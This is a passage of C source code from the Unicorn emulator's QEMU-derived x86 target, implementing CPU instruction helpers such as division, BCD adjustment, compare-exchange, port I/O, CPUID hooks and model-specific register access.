License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "qemu/guest-random.h" //#define DEBUG_MULDIV /* modulo 9 table */ static const uint8_t rclb_table[32] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 1, 2, 3, 4, }; /* modulo 17 table */ static const uint8_t rclw_table[32] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, }; /* division, flags are undefined */ void helper_divb_AL(CPUX86State *env, target_ulong t0) { unsigned int num, den, q, r; num = (env->regs[R_EAX] & 0xffff); den = (t0 & 0xff); if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = (num / den); if (q > 0xff) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q &= 0xff; r = (num % den) & 0xff; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | (r << 8) | q; } void helper_idivb_AL(CPUX86State *env, target_ulong t0) { int num, den, q, r; num = (int16_t)env->regs[R_EAX]; den = (int8_t)t0; if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = (num / den); if (q != (int8_t)q) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q &= 0xff; r = (num % den) & 0xff; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | (r << 8) | q; } void helper_divw_AX(CPUX86State *env, target_ulong t0) { unsigned int num, den, q, r; num = (env->regs[R_EAX] & 0xffff) | ((env->regs[R_EDX] & 0xffff) << 16); den = (t0 & 0xffff); if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = (num / den); if (q > 0xffff) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q &= 0xffff; r = (num % den) & 0xffff; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | q; env->regs[R_EDX] = (env->regs[R_EDX] & ~0xffff) | r; } void helper_idivw_AX(CPUX86State *env, target_ulong t0) { int num, den, q, r; num = (env->regs[R_EAX] & 0xffff) | ((env->regs[R_EDX] & 0xffff) << 16); den = (int16_t)t0; if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = ((int64_t)num / den); if (q != (int16_t)q) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q &= 0xffff; r = (num % den) & 0xffff; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | q; env->regs[R_EDX] = (env->regs[R_EDX] & ~0xffff) | r; } void helper_divl_EAX(CPUX86State *env, target_ulong t0) { unsigned int den, r; uint64_t num, q; num = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); den = (unsigned int)t0; if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = (num / den); r = (num % den); if (q > 0xffffffff) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } env->regs[R_EAX] = (uint32_t)q; env->regs[R_EDX] = (uint32_t)r; } void helper_idivl_EAX(CPUX86State *env, target_ulong t0) { int den, r; int64_t num, q; num = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); den = (int)t0; if (den == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } q = (num / den); r = (num % den); if (q != (int32_t)q) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } env->regs[R_EAX] = (uint32_t)q; env->regs[R_EDX] = (uint32_t)r; } /* bcd */ /* XXX: exception */ void helper_aam(CPUX86State *env, int base) { int al, ah; al = env->regs[R_EAX] & 0xff; ah = al / base; al = al % base; env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); CC_DST = al; } void helper_aad(CPUX86State *env, int base) { int al, ah; al = env->regs[R_EAX] & 0xff; ah = (env->regs[R_EAX] >> 8) & 0xff; al = ((ah * base) + al) & 0xff; env->regs[R_EAX] = 
(env->regs[R_EAX] & ~0xffff) | al; CC_DST = al; } void helper_aaa(CPUX86State *env) { int icarry; int al, ah, af; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); af = eflags & CC_A; al = env->regs[R_EAX] & 0xff; ah = (env->regs[R_EAX] >> 8) & 0xff; icarry = (al > 0xf9); if (((al & 0x0f) > 9) || af) { al = (al + 6) & 0x0f; ah = (ah + 1 + icarry) & 0xff; eflags |= CC_C | CC_A; } else { eflags &= ~(CC_C | CC_A); al &= 0x0f; } env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); CC_SRC = eflags; } void helper_aas(CPUX86State *env) { int icarry; int al, ah, af; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); af = eflags & CC_A; al = env->regs[R_EAX] & 0xff; ah = (env->regs[R_EAX] >> 8) & 0xff; icarry = (al < 6); if (((al & 0x0f) > 9) || af) { al = (al - 6) & 0x0f; ah = (ah - 1 - icarry) & 0xff; eflags |= CC_C | CC_A; } else { eflags &= ~(CC_C | CC_A); al &= 0x0f; } env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); CC_SRC = eflags; } void helper_daa(CPUX86State *env) { int old_al, al, af, cf; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); cf = eflags & CC_C; af = eflags & CC_A; old_al = al = env->regs[R_EAX] & 0xff; eflags = 0; if (((al & 0x0f) > 9) || af) { al = (al + 6) & 0xff; eflags |= CC_A; } if ((old_al > 0x99) || cf) { al = (al + 0x60) & 0xff; eflags |= CC_C; } env->regs[R_EAX] = (env->regs[R_EAX] & ~0xff) | al; /* well, speed is not an issue here, so we compute the flags by hand */ eflags |= (al == 0) << 6; /* zf */ eflags |= parity_table[al]; /* pf */ eflags |= (al & 0x80); /* sf */ CC_SRC = eflags; } void helper_das(CPUX86State *env) { int al, al1, af, cf; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); cf = eflags & CC_C; af = eflags & CC_A; al = env->regs[R_EAX] & 0xff; eflags = 0; al1 = al; if (((al & 0x0f) > 9) || af) { eflags |= CC_A; if (al < 6 || cf) { eflags |= CC_C; } al = (al - 6) & 0xff; } if ((al1 > 0x99) || cf) { al = (al - 0x60) & 0xff; eflags |= CC_C; } env->regs[R_EAX] = (env->regs[R_EAX] & ~0xff) | al; /* well, speed is not an issue here, so we compute the flags by hand */ eflags |= (al == 0) << 6; /* zf */ eflags |= parity_table[al]; /* pf */ eflags |= (al & 0x80); /* sf */ CC_SRC = eflags; } #ifdef TARGET_X86_64 static void add128(uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) { *plow += a; /* carry test */ if (*plow < a) { (*phigh)++; } *phigh += b; } static void neg128(uint64_t *plow, uint64_t *phigh) { *plow = ~*plow; *phigh = ~*phigh; add128(plow, phigh, 1, 0); } /* return TRUE if overflow */ static int div64(uint64_t *plow, uint64_t *phigh, uint64_t b) { uint64_t q, r, a1, a0; int i, qb, ab; a0 = *plow; a1 = *phigh; if (a1 == 0) { q = a0 / b; r = a0 % b; *plow = q; *phigh = r; } else { if (a1 >= b) { return 1; } /* XXX: use a better algorithm */ for (i = 0; i < 64; i++) { ab = a1 >> 63; a1 = (a1 << 1) | (a0 >> 63); if (ab || a1 >= b) { a1 -= b; qb = 1; } else { qb = 0; } a0 = (a0 << 1) | qb; } #if defined(DEBUG_MULDIV) printf("div: 0x%016" PRIx64 "%016" PRIx64 " / 0x%016" PRIx64 ": q=0x%016" PRIx64 " r=0x%016" PRIx64 "\n", *phigh, *plow, b, a0, a1); #endif *plow = a0; *phigh = a1; } return 0; } /* return TRUE if overflow */ static int idiv64(uint64_t *plow, uint64_t *phigh, int64_t b) { int sa, sb; sa = ((int64_t)*phigh < 0); if (sa) { neg128(plow, phigh); } sb = (b < 0); if (sb && (b != 0x8000000000000000LL)) { b = -b; } if (div64(plow, phigh, b) != 0) { return 1; } if (sa ^ sb) { if (*plow > (1ULL << 63)) { return 1; } *plow = 0-*plow; } else { if (*plow >= (1ULL << 63)) { return 1; } } if (sa) { 
*phigh = 0-*phigh; } return 0; } void helper_divq_EAX(CPUX86State *env, target_ulong t0) { uint64_t r0, r1; if (t0 == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } r0 = env->regs[R_EAX]; r1 = env->regs[R_EDX]; if (div64(&r0, &r1, t0)) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } env->regs[R_EAX] = r0; env->regs[R_EDX] = r1; } void helper_idivq_EAX(CPUX86State *env, target_ulong t0) { uint64_t r0, r1; if (t0 == 0) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } r0 = env->regs[R_EAX]; r1 = env->regs[R_EDX]; if (idiv64(&r0, &r1, t0)) { raise_exception_ra(env, EXCP00_DIVZ, GETPC()); } env->regs[R_EAX] = r0; env->regs[R_EDX] = r1; } #endif #if TARGET_LONG_BITS == 32 # define ctztl ctz32 # define clztl clz32 #else # define ctztl ctz64 # define clztl clz64 #endif target_ulong helper_pdep(target_ulong src, target_ulong mask) { target_ulong dest = 0; int i, o; for (i = 0; mask != 0; i++) { o = ctztl(mask); mask &= mask - 1; dest |= ((src >> i) & 1) << o; } return dest; } target_ulong helper_pext(target_ulong src, target_ulong mask) { target_ulong dest = 0; int i, o; for (o = 0; mask != 0; o++) { i = ctztl(mask); mask &= mask - 1; dest |= ((src >> i) & 1) << o; } return dest; } #define SHIFT 0 #include "shift_helper_template.h" #undef SHIFT #define SHIFT 1 #include "shift_helper_template.h" #undef SHIFT #define SHIFT 2 #include "shift_helper_template.h" #undef SHIFT #ifdef TARGET_X86_64 #define SHIFT 3 #include "shift_helper_template.h" #undef SHIFT #endif /* Test that BIT is enabled in CR4. If not, raise an illegal opcode exception. This reduces the requirements for rare CR4 bits being mapped into HFLAGS. */ void helper_cr4_testbit(CPUX86State *env, uint32_t bit) { if (unlikely((env->cr[4] & bit) == 0)) { raise_exception_ra(env, EXCP06_ILLOP, GETPC()); } } target_ulong HELPER(rdrand)(CPUX86State *env) { target_ulong ret; if (qemu_guest_getrandom(&ret, sizeof(ret)) < 0) { // qemu_log_mask(LOG_UNIMP, "rdrand: Crypto failure: %s", // error_get_pretty(err)); // error_free(err); /* Failure clears CF and all other flags, and returns 0. */ env->cc_src = 0; return 0; } /* Success sets CF and clears all others. 
     */
    env->cc_src = CC_C;
    return ret;
}
unicorn-2.1.1/qemu/target/i386/machine.c
#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/exec-all.h"
#include "sysemu/tcg.h"

void cpu_get_fp80(uint64_t *pmant, uint16_t *pexp, floatx80 f)
{
    CPU_LDoubleU temp;

    temp.d = f;
    *pmant = temp.l.lower;
    *pexp = temp.l.upper;
}

floatx80 cpu_set_fp80(uint64_t mant, uint16_t upper)
{
    CPU_LDoubleU temp;

    temp.l.upper = upper;
    temp.l.lower = mant;
    return temp.d;
}
unicorn-2.1.1/qemu/target/i386/mem_helper.c
/*
 * x86 memory access helpers
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/helper-proto.h"
#include "exec/exec-all.h"
#include "exec/cpu_ldst.h"
#include "qemu/int128.h"
#include "qemu/atomic128.h"
#include "tcg/tcg.h"

void helper_cmpxchg8b_unlocked(CPUX86State *env, target_ulong a0)
{
    uintptr_t ra = GETPC();
    uint64_t oldv, cmpv, newv;
    int eflags;

    eflags = cpu_cc_compute_all(env, CC_OP);

    cmpv = deposit64(env->regs[R_EAX], 32, 32, env->regs[R_EDX]);
    newv = deposit64(env->regs[R_EBX], 32, 32, env->regs[R_ECX]);

    oldv = cpu_ldq_data_ra(env, a0, ra);
    newv = (cmpv == oldv ?
newv : oldv); /* always do the store */ cpu_stq_data_ra(env, a0, newv, ra); if (oldv == cmpv) { eflags |= CC_Z; } else { env->regs[R_EAX] = (uint32_t)oldv; env->regs[R_EDX] = (uint32_t)(oldv >> 32); eflags &= ~CC_Z; } CC_SRC = eflags; } void helper_cmpxchg8b(CPUX86State *env, target_ulong a0) { #ifdef CONFIG_ATOMIC64 uint64_t oldv, cmpv, newv; int eflags; eflags = cpu_cc_compute_all(env, CC_OP); cmpv = deposit64(env->regs[R_EAX], 32, 32, env->regs[R_EDX]); newv = deposit64(env->regs[R_EBX], 32, 32, env->regs[R_ECX]); { uintptr_t ra = GETPC(); int mem_idx = cpu_mmu_index(env, false); TCGMemOpIdx oi = make_memop_idx(MO_TEQ, mem_idx); oldv = helper_atomic_cmpxchgq_le_mmu(env, a0, cmpv, newv, oi, ra); } if (oldv == cmpv) { eflags |= CC_Z; } else { env->regs[R_EAX] = (uint32_t)oldv; env->regs[R_EDX] = (uint32_t)(oldv >> 32); eflags &= ~CC_Z; } CC_SRC = eflags; #else cpu_loop_exit_atomic(env_cpu(env), GETPC()); #endif /* CONFIG_ATOMIC64 */ } #ifdef TARGET_X86_64 void helper_cmpxchg16b_unlocked(CPUX86State *env, target_ulong a0) { uintptr_t ra = GETPC(); Int128 oldv, cmpv, newv; uint64_t o0, o1; int eflags; bool success; if ((a0 & 0xf) != 0) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } eflags = cpu_cc_compute_all(env, CC_OP); cmpv = int128_make128(env->regs[R_EAX], env->regs[R_EDX]); newv = int128_make128(env->regs[R_EBX], env->regs[R_ECX]); o0 = cpu_ldq_data_ra(env, a0 + 0, ra); o1 = cpu_ldq_data_ra(env, a0 + 8, ra); oldv = int128_make128(o0, o1); success = int128_eq(oldv, cmpv); if (!success) { newv = oldv; } cpu_stq_data_ra(env, a0 + 0, int128_getlo(newv), ra); cpu_stq_data_ra(env, a0 + 8, int128_gethi(newv), ra); if (success) { eflags |= CC_Z; } else { env->regs[R_EAX] = int128_getlo(oldv); env->regs[R_EDX] = int128_gethi(oldv); eflags &= ~CC_Z; } CC_SRC = eflags; } void helper_cmpxchg16b(CPUX86State *env, target_ulong a0) { uintptr_t ra = GETPC(); if ((a0 & 0xf) != 0) { raise_exception_ra(env, EXCP0D_GPF, ra); } else if (HAVE_CMPXCHG128) { int eflags = cpu_cc_compute_all(env, CC_OP); Int128 cmpv = int128_make128(env->regs[R_EAX], env->regs[R_EDX]); Int128 newv = int128_make128(env->regs[R_EBX], env->regs[R_ECX]); int mem_idx = cpu_mmu_index(env, false); TCGMemOpIdx oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); Int128 oldv = helper_atomic_cmpxchgo_le_mmu(env, a0, cmpv, newv, oi, ra); if (int128_eq(oldv, cmpv)) { eflags |= CC_Z; } else { env->regs[R_EAX] = int128_getlo(oldv); env->regs[R_EDX] = int128_gethi(oldv); eflags &= ~CC_Z; } CC_SRC = eflags; } else { cpu_loop_exit_atomic(env_cpu(env), ra); } } #endif void helper_boundw(CPUX86State *env, target_ulong a0, int v) { int low, high; low = cpu_ldsw_data_ra(env, a0, GETPC()); high = cpu_ldsw_data_ra(env, a0 + 2, GETPC()); v = (int16_t)v; if (v < low || v > high) { if (env->hflags & HF_MPX_EN_MASK) { env->bndcs_regs.sts = 0; } raise_exception_ra(env, EXCP05_BOUND, GETPC()); } } void helper_boundl(CPUX86State *env, target_ulong a0, int v) { int low, high; low = cpu_ldl_data_ra(env, a0, GETPC()); high = cpu_ldl_data_ra(env, a0 + 4, GETPC()); if (v < low || v > high) { if (env->hflags & HF_MPX_EN_MASK) { env->bndcs_regs.sts = 0; } raise_exception_ra(env, EXCP05_BOUND, GETPC()); } } 
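/*
 * Illustrative sketch (not part of the QEMU/Unicorn sources): the CMPXCHG8B
 * helpers above all follow the same contract.  EDX:EAX is the comparand,
 * ECX:EBX the replacement; on a match ZF is set and memory receives
 * ECX:EBX, otherwise ZF is cleared and the old memory value is loaded back
 * into EDX:EAX.  The unconditional store in the unlocked variant mirrors
 * hardware, which always writes the destination.  A self-contained model,
 * with a plain pointer standing in for guest memory:
 */
#if 0
#include <stdint.h>
#include <stdbool.h>

static bool cmpxchg8b_model(uint64_t *mem, uint32_t *eax, uint32_t *edx,
                            uint32_t ebx, uint32_t ecx)
{
    uint64_t cmpv = ((uint64_t)*edx << 32) | *eax;   /* EDX:EAX */
    uint64_t newv = ((uint64_t)ecx << 32) | ebx;     /* ECX:EBX */
    uint64_t oldv = *mem;

    *mem = (oldv == cmpv) ? newv : oldv;             /* always do the store */
    if (oldv == cmpv) {
        return true;                                 /* ZF set */
    }
    *eax = (uint32_t)oldv;                           /* reload EDX:EAX */
    *edx = (uint32_t)(oldv >> 32);
    return false;                                    /* ZF clear */
}
#endif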
unicorn-2.1.1/qemu/target/i386/misc_helper.c
/*
 * x86 misc helpers
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/helper-proto.h"
#include "exec/exec-all.h"
#include "exec/cpu_ldst.h"
#include "exec/ioport.h"

#include "uc_priv.h"
#include "tcg/tcg-apple-jit.h"

void helper_outb(CPUX86State *env, uint32_t port, uint32_t data)
{
// #ifdef UNICORN_ARCH_POSTFIX
//     glue(address_space_stb, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port, data & 0xff,
// #else
//     address_space_stb(env->uc, &env->uc->address_space_io, port, data & 0xff,
// #endif
//                       cpu_get_mem_attrs(env), NULL);
    return cpu_outb(env->uc, port, data);
}

target_ulong helper_inb(CPUX86State *env, uint32_t port)
{
// #ifdef UNICORN_ARCH_POSTFIX
//     return glue(address_space_ldub, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port,
// #else
//     return address_space_ldub(env->uc, &env->uc->address_space_io, port,
// #endif
//                               cpu_get_mem_attrs(env), NULL);
    return cpu_inb(env->uc, port);
}

void helper_outw(CPUX86State *env, uint32_t port, uint32_t data)
{
// #ifdef UNICORN_ARCH_POSTFIX
//     glue(address_space_stw, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port, data & 0xffff,
// #else
//     address_space_stw(env->uc, &env->uc->address_space_io, port, data & 0xffff,
// #endif
//                       cpu_get_mem_attrs(env), NULL);
    return cpu_outw(env->uc, port, data);
}

target_ulong helper_inw(CPUX86State *env, uint32_t port)
{
// #ifdef UNICORN_ARCH_POSTFIX
//     return glue(address_space_lduw, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port,
// #else
//     return address_space_lduw(env->uc, &env->uc->address_space_io, port,
// #endif
//                               cpu_get_mem_attrs(env), NULL);
    return cpu_inw(env->uc, port);
}

void helper_outl(CPUX86State *env, uint32_t port, uint32_t data)
{
// #ifdef UNICORN_ARCH_POSTFIX
//     glue(address_space_stl, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port, data,
// #else
// address_space_stl(env->uc,
&env->uc->address_space_io, port, data, // #endif // cpu_get_mem_attrs(env), NULL); return cpu_outl(env->uc, port, data); } target_ulong helper_inl(CPUX86State *env, uint32_t port) { // #ifdef UNICORN_ARCH_POSTFIX // return glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(env->uc, &env->uc->address_space_io, port, // #else // return address_space_ldl(env->uc, &env->uc->address_space_io, port, // #endif // cpu_get_mem_attrs(env), NULL); return cpu_inl(env->uc, port); } void helper_into(CPUX86State *env, int next_eip_addend) { int eflags; eflags = cpu_cc_compute_all(env, CC_OP); if (eflags & CC_O) { raise_interrupt(env, EXCP04_INTO, 1, 0, next_eip_addend); } } void helper_cpuid(CPUX86State *env) { uint32_t eax, ebx, ecx, edx; uc_engine *uc = env->uc; struct hook *hook; int skip_cpuid = 0; cpu_svm_check_intercept_param(env, SVM_EXIT_CPUID, 0, GETPC()); // Unicorn: call registered CPUID hooks HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(env->uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, env->eip)) continue; // Multiple cpuid callbacks returning different values is undefined. // true -> skip the cpuid instruction if (hook->insn == UC_X86_INS_CPUID) { JIT_CALLBACK_GUARD_VAR(skip_cpuid, ((uc_cb_insn_cpuid_t)hook->callback)(env->uc, hook->user_data)); } // the last callback may already asked to stop emulation if (env->uc->stop_request) break; } if (!skip_cpuid) { cpu_x86_cpuid(env, (uint32_t)env->regs[R_EAX], (uint32_t)env->regs[R_ECX], &eax, &ebx, &ecx, &edx); env->regs[R_EAX] = eax; env->regs[R_EBX] = ebx; env->regs[R_ECX] = ecx; env->regs[R_EDX] = edx; } } target_ulong helper_read_crN(CPUX86State *env, int reg) { target_ulong val; cpu_svm_check_intercept_param(env, SVM_EXIT_READ_CR0 + reg, 0, GETPC()); switch (reg) { default: val = env->cr[reg]; break; case 8: if (!(env->hflags2 & HF2_VINTR_MASK)) { // val = cpu_get_apic_tpr(env_archcpu(env)->apic_state); val = 0; } else { val = env->v_tpr; } break; } return val; } void helper_write_crN(CPUX86State *env, int reg, target_ulong t0) { cpu_svm_check_intercept_param(env, SVM_EXIT_WRITE_CR0 + reg, 0, GETPC()); switch (reg) { case 0: cpu_x86_update_cr0(env, (uint32_t)t0); break; case 3: cpu_x86_update_cr3(env, t0); break; case 4: cpu_x86_update_cr4(env, (uint32_t)t0); break; case 8: #if 0 if (!(env->hflags2 & HF2_VINTR_MASK)) { cpu_set_apic_tpr(env_archcpu(env)->apic_state, t0); } #endif env->v_tpr = t0 & 0x0f; break; default: env->cr[reg] = t0; break; } } void helper_lmsw(CPUX86State *env, target_ulong t0) { /* only 4 lower bits of CR0 are modified. PE cannot be set to zero if already set to one. 
*/ t0 = (env->cr[0] & ~0xe) | (t0 & 0xf); helper_write_crN(env, 0, t0); } void helper_invlpg(CPUX86State *env, target_ulong addr) { X86CPU *cpu = env_archcpu(env); cpu_svm_check_intercept_param(env, SVM_EXIT_INVLPG, 0, GETPC()); tlb_flush_page(CPU(cpu), addr); } void helper_rdtsc(CPUX86State *env) { uint64_t val; if ((env->cr[4] & CR4_TSD_MASK) && ((env->hflags & HF_CPL_MASK) != 0)) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } cpu_svm_check_intercept_param(env, SVM_EXIT_RDTSC, 0, GETPC()); val = cpu_get_tsc(env) + env->tsc_offset; env->regs[R_EAX] = (uint32_t)(val); env->regs[R_EDX] = (uint32_t)(val >> 32); } void helper_rdtscp(CPUX86State *env) { helper_rdtsc(env); env->regs[R_ECX] = (uint32_t)(env->tsc_aux); } void helper_rdpmc(CPUX86State *env) { if ((env->cr[4] & CR4_PCE_MASK) && ((env->hflags & HF_CPL_MASK) != 0)) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } cpu_svm_check_intercept_param(env, SVM_EXIT_RDPMC, 0, GETPC()); /* currently unimplemented */ qemu_log_mask(LOG_UNIMP, "x86: unimplemented rdpmc\n"); raise_exception_err(env, EXCP06_ILLOP, 0); } void helper_wrmsr(CPUX86State *env) { uint64_t val; cpu_svm_check_intercept_param(env, SVM_EXIT_MSR, 1, GETPC()); val = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); switch ((uint32_t)env->regs[R_ECX]) { case MSR_IA32_SYSENTER_CS: env->sysenter_cs = val & 0xffff; break; case MSR_IA32_SYSENTER_ESP: env->sysenter_esp = val; break; case MSR_IA32_SYSENTER_EIP: env->sysenter_eip = val; break; case MSR_IA32_APICBASE: // cpu_set_apic_base(env_archcpu(env)->apic_state, val); break; case MSR_EFER: { uint64_t update_mask; update_mask = 0; if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_SYSCALL) { update_mask |= MSR_EFER_SCE; } if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_LM) { update_mask |= MSR_EFER_LME; } if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_FFXSR) { update_mask |= MSR_EFER_FFXSR; } if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_NX) { update_mask |= MSR_EFER_NXE; } if (env->features[FEAT_8000_0001_ECX] & CPUID_EXT3_SVM) { update_mask |= MSR_EFER_SVME; } if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_FFXSR) { update_mask |= MSR_EFER_FFXSR; } cpu_load_efer(env, (env->efer & ~update_mask) | (val & update_mask)); } break; case MSR_STAR: env->star = val; break; case MSR_PAT: env->pat = val; break; case MSR_VM_HSAVE_PA: env->vm_hsave = val; break; #ifdef TARGET_X86_64 case MSR_LSTAR: env->lstar = val; break; case MSR_CSTAR: env->cstar = val; break; case MSR_FMASK: env->fmask = val; break; case MSR_FSBASE: env->segs[R_FS].base = val; break; case MSR_GSBASE: env->segs[R_GS].base = val; break; case MSR_KERNELGSBASE: env->kernelgsbase = val; break; #endif case MSR_MTRRphysBase(0): case MSR_MTRRphysBase(1): case MSR_MTRRphysBase(2): case MSR_MTRRphysBase(3): case MSR_MTRRphysBase(4): case MSR_MTRRphysBase(5): case MSR_MTRRphysBase(6): case MSR_MTRRphysBase(7): env->mtrr_var[((uint32_t)env->regs[R_ECX] - MSR_MTRRphysBase(0)) / 2].base = val; break; case MSR_MTRRphysMask(0): case MSR_MTRRphysMask(1): case MSR_MTRRphysMask(2): case MSR_MTRRphysMask(3): case MSR_MTRRphysMask(4): case MSR_MTRRphysMask(5): case MSR_MTRRphysMask(6): case MSR_MTRRphysMask(7): env->mtrr_var[((uint32_t)env->regs[R_ECX] - MSR_MTRRphysMask(0)) / 2].mask = val; break; case MSR_MTRRfix64K_00000: env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - MSR_MTRRfix64K_00000] = val; break; case MSR_MTRRfix16K_80000: case MSR_MTRRfix16K_A0000: env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - MSR_MTRRfix16K_80000 + 1] = val; break; case 
MSR_MTRRfix4K_C0000: case MSR_MTRRfix4K_C8000: case MSR_MTRRfix4K_D0000: case MSR_MTRRfix4K_D8000: case MSR_MTRRfix4K_E0000: case MSR_MTRRfix4K_E8000: case MSR_MTRRfix4K_F0000: case MSR_MTRRfix4K_F8000: env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - MSR_MTRRfix4K_C0000 + 3] = val; break; case MSR_MTRRdefType: env->mtrr_deftype = val; break; case MSR_MCG_STATUS: env->mcg_status = val; break; case MSR_MCG_CTL: if ((env->mcg_cap & MCG_CTL_P) && (val == 0 || val == ~(uint64_t)0)) { env->mcg_ctl = val; } break; case MSR_TSC_AUX: env->tsc_aux = val; break; case MSR_IA32_MISC_ENABLE: env->msr_ia32_misc_enable = val; break; case MSR_IA32_BNDCFGS: /* FIXME: #GP if reserved bits are set. */ /* FIXME: Extend highest implemented bit of linear address. */ env->msr_bndcfgs = val; cpu_sync_bndcs_hflags(env); break; default: if ((uint32_t)env->regs[R_ECX] >= MSR_MC0_CTL && (uint32_t)env->regs[R_ECX] < MSR_MC0_CTL + (4 * env->mcg_cap & 0xff)) { uint32_t offset = (uint32_t)env->regs[R_ECX] - MSR_MC0_CTL; if ((offset & 0x3) != 0 || (val == 0 || val == ~(uint64_t)0)) { env->mce_banks[offset] = val; } break; } /* XXX: exception? */ break; } } void helper_rdmsr(CPUX86State *env) { X86CPU *x86_cpu = env_archcpu(env); uint64_t val; cpu_svm_check_intercept_param(env, SVM_EXIT_MSR, 0, GETPC()); switch ((uint32_t)env->regs[R_ECX]) { case MSR_IA32_SYSENTER_CS: val = env->sysenter_cs; break; case MSR_IA32_SYSENTER_ESP: val = env->sysenter_esp; break; case MSR_IA32_SYSENTER_EIP: val = env->sysenter_eip; break; case MSR_IA32_APICBASE: val = 0; // cpu_get_apic_base(env_archcpu(env)->apic_state); break; case MSR_EFER: val = env->efer; break; case MSR_STAR: val = env->star; break; case MSR_PAT: val = env->pat; break; case MSR_VM_HSAVE_PA: val = env->vm_hsave; break; case MSR_IA32_PERF_STATUS: /* tsc_increment_by_tick */ val = 1000ULL; /* CPU multiplier */ val |= (((uint64_t)4ULL) << 40); break; #ifdef TARGET_X86_64 case MSR_LSTAR: val = env->lstar; break; case MSR_CSTAR: val = env->cstar; break; case MSR_FMASK: val = env->fmask; break; case MSR_FSBASE: val = env->segs[R_FS].base; break; case MSR_GSBASE: val = env->segs[R_GS].base; break; case MSR_KERNELGSBASE: val = env->kernelgsbase; break; case MSR_TSC_AUX: val = env->tsc_aux; break; #endif 